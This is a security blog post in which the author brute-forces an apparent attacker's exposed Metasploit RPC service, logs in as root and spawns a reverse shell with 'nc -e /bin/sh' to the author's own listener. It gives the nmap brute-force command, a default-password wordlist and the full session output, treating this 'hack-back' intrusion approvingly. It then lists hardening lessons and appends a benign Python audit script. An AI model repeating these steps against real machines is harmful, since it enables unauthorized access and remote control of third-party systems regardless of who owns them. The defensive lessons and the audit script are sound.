Information Security

22nd August 2012

Backtracking The Backtrackers

As we can see at https://www.google.com/trends/?q=backtrack+linux, Backtrack is very popular in my country, but that doesn't mean we have great pentesters around here; they are using it for malicious hacktivity.

I watch Tom Liston's honeypot (https://twitter.com/netmenaces) and the attacker IPs from Indonesia:

most of them are running Backtrack.

Well, I found an interesting attacker who binds msfrpcd to all interfaces.

Because my feeling said this guy had no idea, I tried to bruteforce it:

% ./nmap -p55553 HOST --script metasploit-msgrpc-brute --script-args userdb=word.txt,passdb=word.txt

Starting Nmap 6.02 ( http://nmap.org ) at 2012-08-22 11:59 WIT
Nmap scan report for HOST
Host is up (0.00033s latency).
PORT      STATE SERVICE
55553/tcp open  unknown
| metasploit-msgrpc-brute:
|   Accounts
|     msf:test - Valid credentials
|   Statistics
|_    Performed 35 guesses in 48 seconds, average tps: 0

Nmap done: 1 IP address (1 host up) scanned in 47.38 seconds

Here is word.txt, which I collected from blogs, wikis, forums, etc.:

% cat word.txt
msf
test
msf3
password
armitage
user
msf3password
toortoor
Securepass
pass123
xxx
msfpassword2
a_password
s3cr3tp4ss
toor
1337
wpscan
abc123

Now it is time to spawn his Metasploit:

% pymsfconsole -U msf -P test -a HOST


# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops


msf > whoami && id && uname -a
msf >
[*] exec: whoami && id && uname -a

root
uid=0(root) gid=0(root) groups=0(root)
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux

msf > nc -e /bin/sh MINE 7331
msf >
[*] exec: nc -e /bin/sh MINE 7331


+ a reverse shell for a real environment and fast output

irb supports executing OS system commands,

and like Jason Haddix said

I had already bound my listener:

% nc -vlnp7331

listening on [any] 7331 ...
connect to [MINE] from (UNKNOWN) [HOST] 59950

ps -p $$
  PID TTY          TIME CMD
 9228 pts/0    00:00:00 sh
lsof -i tcp
COMMAND    PID     USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
postgres.  893 postgres    3u  IPv6   7887      0t0  TCP localhost:7337 (LISTEN)
postgres.  893 postgres    4u  IPv4   7888      0t0  TCP localhost:7337 (LISTEN)
.ruby.bin 1630     root    6u  IPv4  11159      0t0  TCP *:55553 (LISTEN)
.ruby.bin 1630     root    8u  IPv6  11806      0t0  TCP localhost:39904->localhost:7337 (ESTABLISHED)
.ruby.bin 1630     root   10u  IPv4  20589      0t0  TCP localhost:53318->localhost:54123 (ESTABLISHED)
.ruby.bin 1630     root   11u  IPv6  11212      0t0  TCP localhost:39903->localhost:7337 (ESTABLISHED)
.ruby.bin 1630     root   12u  IPv4  20590      0t0  TCP localhost:54123->localhost:53318 (ESTABLISHED)
.ruby.bin 1630     root   13u  IPv4  20921      0t0  TCP localhost:58392->localhost:53712 (ESTABLISHED)
.ruby.bin 1630     root   14u  IPv4  21851      0t0  TCP localhost:53712->localhost:58392 (ESTABLISHED)
postgres. 1756 postgres    7u  IPv6  11802      0t0  TCP localhost:7337->localhost:39903 (ESTABLISHED)
postgres. 1757 postgres    7u  IPv6  11214      0t0  TCP localhost:7337->localhost:39904 (ESTABLISHED)
sh        9228     root    0u  IPv4  21881      0t0  TCP HOST:59950->MINE:7331 (ESTABLISHED)
sh        9228     root    1u  IPv4  21881      0t0  TCP HOST:59950->MINE:7331 (ESTABLISHED)
lsof      9998     root    0u  IPv4  21881      0t0  TCP HOST:59950->MINE:7331 (ESTABLISHED)
lsof      9998     root    1u  IPv4  21881      0t0  TCP HOST:59950->MINE:7331 (ESTABLISHED)
netstat -natp | grep LIST
tcp        0      0 127.0.0.1:7337          0.0.0.0:*               LISTEN      893/postgres.bin
tcp        0      0 0.0.0.0:55553           0.0.0.0:*               LISTEN      1630/msfrpcd   
tcp6       0      0 ::1:7337                :::*                    LISTEN      893/postgres.bin

Lessons Learned:

1. Use it locally: bind only to 127.0.0.1.

2. Tune your firewall.

3. Do not run everything as root; learn chrooting and privilege separation.

4. Don't use the default configuration.

5. Don't follow manual, blog, forum, wiki, etc. instructions if they contain sensitive information.
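As an added example (not code from the original post), here is a small Python check a defender can run over `lsof -i tcp` output to catch the two misconfigurations behind lessons 1 and 3: a service bound to every interface and a listener owned by root. The sample lines are constructed after the lsof capture shown above.

```python
"""Audit `lsof -i tcp` output for wildcard binds and root-owned listeners.

Added example, not from the original post. The sample below is
constructed from the post's lsof capture (HOST/MINE placeholders kept).
"""
from dataclasses import dataclass

# Constructed sample, modelled on the lsof output captured in the post.
SAMPLE_LSOF = """\
COMMAND    PID     USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
postgres.  893 postgres    3u  IPv6   7887      0t0  TCP localhost:7337 (LISTEN)
postgres.  893 postgres    4u  IPv4   7888      0t0  TCP localhost:7337 (LISTEN)
.ruby.bin 1630     root    6u  IPv4  11159      0t0  TCP *:55553 (LISTEN)
.ruby.bin 1630     root    8u  IPv6  11806      0t0  TCP localhost:39904->localhost:7337 (ESTABLISHED)
sh        9228     root    0u  IPv4  21881      0t0  TCP HOST:59950->MINE:7331 (ESTABLISHED)
"""

# Addresses lsof prints for a socket that listens on every interface.
WILDCARD_HOSTS = {"*", "0.0.0.0", "::", "[::]"}


@dataclass
class Listener:
    command: str
    pid: int
    user: str
    host: str
    port: int


def parse_listeners(text):
    """Return the LISTEN sockets from lsof -i output (header and
    ESTABLISHED lines are skipped)."""
    listeners = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 10 or fields[-1] != "(LISTEN)":
            continue
        host, _, port = fields[-2].rpartition(":")  # e.g. "*:55553"
        listeners.append(Listener(fields[0], int(fields[1]), fields[2], host, int(port)))
    return listeners


def audit(text):
    """Flag each listener that is bound to all interfaces (lesson 1)
    or running as root (lesson 3); returns (port, command, reason) tuples."""
    findings = []
    for lsn in parse_listeners(text):
        if lsn.host in WILDCARD_HOSTS:
            findings.append((lsn.port, lsn.command, "bound to all interfaces"))
        if lsn.user == "root":
            findings.append((lsn.port, lsn.command, "listening as root"))
    return findings
```

On the captured host the only hits are for port 55553 (msfrpcd), which matches what the netstat output above shows; the loopback-only postgres listeners pass.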

Tagged: Chrooting, Exploit, Firewall, Honeypot, Network Security, Penetration Testing, x86, System V

ABOUT THE AUTHOR

Teguh is an idealist pwner living encrypted in Indonesia.
He is passionate about security and currently defeating the CWE top 25.
He also can be found on Google+, Twitter, GitHub, Shelfari and your libc.